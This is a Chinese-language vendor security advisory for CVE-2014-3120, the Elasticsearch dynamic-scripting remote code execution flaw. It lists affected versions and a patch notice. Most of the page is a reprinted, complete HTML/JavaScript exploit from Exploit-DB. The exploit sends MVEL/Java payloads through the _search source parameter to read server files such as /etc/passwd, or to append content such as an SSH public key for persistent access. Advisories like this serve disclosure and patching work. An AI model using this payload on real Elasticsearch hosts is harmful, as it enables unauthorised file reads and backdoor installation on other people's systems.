当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Elasticsearch任意Java代码执行漏洞(CVE-2014-3120)

     发表日期:2014-12-03 16:58:00

Elasticsearch任意Java代码执行漏洞(CVE-2014-3120)

BugTraq-ID:67731

CVE-ID:CVE-2014-3120

发布日期:2013-12-09

更新日期:2013-12-09

受影响系统:

ElasticSearch ElasticSearch < 1.2

详细信息:

Elasticsearch是开源的搜索引擎。 ElasticSearch 1.2之前版本默认配置中启用动态脚本后,可使远程攻击者通过to _search的source参数,利用此漏洞执行任意MVEL表达式及Java代码。

来源:

Alex Brasetvik

测试方法:

警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.exploit-db.com/exploits/33370/ <!-- ##CVE-2014-3120 Elastic Search Remote Code Execution This project demonstrates the CVE-2014-3120 vulnerability/misconfiguration. It allows you to read from and append to files on the system hosting ES, provided the user running ES has access to them. ###Notes This does not require a web server. Save it locally and run it from a browser. Discovery and vuln publishing credit goes to: @BvdBijl - http://bouk.co/blog/elasticsearch-rce/ --> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- Latest compiled and minified CSS --> <link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet"> <!-- Optional theme --> <link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap-theme.min.css" rel="stylesheet"> <style> body { padding-top: 50px; } .starter-template { padding: 40px 15px; text-align: center; } </style> </head> <script src="http://code.jquery.com/jquery-1.11.1.min.js"></script> <script> function es_inject() { var read_file; var write_file; read_file = function(filename) { return ("import java.util.*;\\nimport java.io.*;\\nnew Scanner(new File(\\"" + filename + "\\")).useDelimiter(\\"\\\\\\\\Z\\").next();"); }; write_file = function(filename) { return ("import java.util.*;\\nimport java.io.*;\\nPrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\\"" + filename + "\\", true)));\\nwriter.println(\\"" + document.getElementById("element_2").value + "\\");\\nwriter.close();"); }; $(function() { var payload, filename, files, host, _i, _len; files = [document.getElementById("element_3").value]; payload = { "size": 1, "query": { "filtered": { "query": { "match_all": {} } } }, "script_fields": {} }; if (document.getElementById("element_4").checked) { for (_i = 0, _len = files.length; _i < _len; _i++) { filename = files[_i]; payload["script_fields"][filename] = { "script": write_file(filename) }; } } else { for (_i = 0, _len = files.length; _i < _len; _i++) { filename = files[_i]; payload["script_fields"][filename] = { "script": read_file(filename) }; } } $.getJSON("http://" + document.getElementById("element_1").value + ":9200/_search?source=" + (encodeURIComponent(JSON.stringify(payload))) + "&callback=?", function(data) { var content, contents, hit, _j, _len1, _ref, _results; console.log(data); _ref = data["hits"]["hits"]; _results = []; for (_j = 0, _len1 = _ref.length; _j < _len1; _j++) { hit = _ref[_j]; _results.push((function() { var _k, _len2, _ref1; _ref1 = hit["fields"]; for (filename in _ref1) { contents = _ref1[filename]; document.getElementById("script_results").innerHTML += ("<h2>" + filename + "</h2>"); for (_k = 0, _len2 = contents.length; _k < _len2; _k++) { content = contents[_k]; document.getElementById("script_results").innerHTML += (content); } document.getElementById("script_results").innerHTML += ("<hr>"); //document.getElementById("script_results").innerHTML += (document.getElementById("element_4").checked); } })()); } return _results; }); }); }; //es_inject(); </script> <body> <div class="navbar navbar-inverse navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#">Elastic Inject</a> </div> </div> </div> <div class="container"> <div class="starter-template"> <h2>CVE-2014-3120 Elastic Search Remote Code Execution</h2> <p class="lead">This will read and write files from an ES instance vulnerable to CVE-2014-3120.<br> This is for demonstration purposes only.</p> </div> <div class="col-md-8"> <!-- <form id="ES_Inject" action="" method=""> /--> <label for="element_1">ES_IP_Address: </label><br/> <input id="element_1" name="element_1" class="element text medium" type="text" maxlength="255" value="127.0.0.1"/> <br/> <label for="element_3">File to read/append to: </label><br/> <input id="element_3" name="element_3" class="element text medium" type="text" maxlength="255" value="/etc/passwd"/> <br/> <label class="description" for="element_2">Content to append: </label><br/> <textarea id="element_2" name="element_2" class="element textarea large">YOUR_SSH_PUBLIC_KEY or SOMETHING</textarea> <br/> <!-- <input id="element_4" type="radio" name="es_action" value="read" checked>READ<br/> /--> <input id="element_4" type="checkbox" name="es_action" value="write">WRITE<br/> <!-- <input id="saveForm" class="button_text" type="submit" name="submit" value="Submit" onClick="es_inject();"/> /--> <button onclick="es_inject();">Click me</button> <!-- </form> /--> <h3>Your file contents should appear below if a read is successful. </h3> <div id="script_results"> </div> </div> <div class="col-md-8"> Original vulnerability discovered by <a href="https://twitter.com/bvdbijl"> @BvdBijl</a> - <a href="http://bouk.co/blog/elasticsearch-rce/">http://bouk.co/blog/elasticsearch-rce/</a> </div> </div><!-- /.container --> <script src="//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script> </body></html>

解决办法:

厂商补丁:

ElasticSearch

-------------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.elasticsearch.org/